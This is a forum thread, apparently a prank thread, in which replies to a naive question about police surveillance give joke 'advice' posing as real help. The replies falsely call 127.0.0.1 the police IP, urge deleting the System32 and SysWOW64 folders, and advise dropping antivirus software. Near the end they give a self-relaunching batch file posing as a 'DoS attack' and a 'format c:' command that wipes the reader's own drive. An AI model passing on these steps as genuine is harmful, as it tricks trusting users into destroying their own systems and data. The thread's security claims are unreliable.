Hello im am wondering how do i know if the cops is spying on me ?? Thanks :)
This is a easy one. Basically, you have to ping the cyber police IP address, and based on the time it takes for the answer to be received, you'll know if they're spying on you. The cyber police IP address is 127.0.0.1, and if the ping takes more than 1ms, you're OK. However, if the ping takes less than 1ms, then you're pretty much fucked.

^^this. I had this problem before with my old Android device. I installed a virus on that ip and it took care of them. They never caught shit, not even the epic porn or illegal movies I downloaded.

Yeah, I did that too. Worked like a charm.
The tricky part was getting the virus on the phone and then to attach the to ip.
Good luck OP :)

They're always spying on you.
If you want true confirmation ask yourself if you're a real person and have a cell phone. If the answer is yes, then they're spying on you.
You're welcome

If you hear a slight echo while you are talking on the phone then they are listening to you.

You need to open your DOS program. Start->All Programs-> Accessorys-> Command Line
Then type in this little black box, "ping 127.0.0.1" without the quotes.
This is on your computer though. If they have your cell phone you can be assured they have your PC too.

Professor Potato is right.. in most cases the 127.0.0.1 address is the right one cause it is shared with all police departments in the world but sometimes they use a different address. You can verify the IP address with a secret trick. As I said before this is secret and confidential so please don't tell everybody. I think you are running windows on your machine so here is the windows way.
First we ask google for the domain name used by the police in stockholm and get polisen.se
- go to start -> run -> and type cmd (be sure to do it as admin)
- Copy and paste the following command: echo 127.0.0.1 polisen.se >> %SYSTEMDRIVE%\Windows\System32\Drivers\Etc\Hosts
- next you need to run ipconfig/flushdns
- now you should be able to query the DNS Service for the domain name polisen.se and you will get the IP address 127.0.0.1 returned.
Hope this answers your question.

on a phone, it's impossible to tell which folder it is in, but on a windows computer, they usually install some software onto either System32, or SysWOW64, to monitor it. delete those two folders, and you should be safe. And just to be extra careful, don't use any proprietary antivirus or firewall, they carry monitoring software too. And, final tip, Internet explorer is probably your safest browser option. either that or google chrome. They don't get monitored, or exploited. Very safe!

Actually I tried this, but it didn't worked for me.
I got an error of "ACCESS DENIED". I was logged in as administrator, but still I got this message, tried a lot to fix this by myself, but as usual the result was same. What the hell is wrong with my PC/CONNECTION?
and yes I'am using a dynamic IP.

are you on LAN/WIFI? for example, are you using a school or library computer with more than one computers connected to the same network? is so, try to do this when there is only YOU on the network and the other PCs are turned off or disconnected

You have too many packets in your connection. Reduce the number of packets that are traveling into your NIC by some sort of filtration system (latex condoms should work just fine) and you'll see that it will work with no problems.
Here's a pic to show to to install the condom:

it's symbian series 60v3. so I guess it's not possible to root it, as it is only possible in android based platform

You're in luck! I figured out a way to attack the police IP! This method of attack is called the, "DoS" attack, or "Denial of Service," attack. Copy and paste this code into notepad:
@echo off
color 0a
:polisen.se
start "Down with the PIGS!!!"
goto polisen.se
Now here's the tricky part. In order for this to work, you need to do "Save as..." from FILE in notepad as this:
File name: dosattack.bat
Save as type: All Files
Then all you need to do is double-click your new DOS program, and the police will never be able to use the internet again. Let us know how it works out!

Actually

:polisen.se
echo "Bort med er snutjävlar"
start dosattack.bat
goto polisen.se
is the better code...
You can also go on to cmd.exe and write
format c: /q &::polisen.se
This will remove all data polisen.se has of you
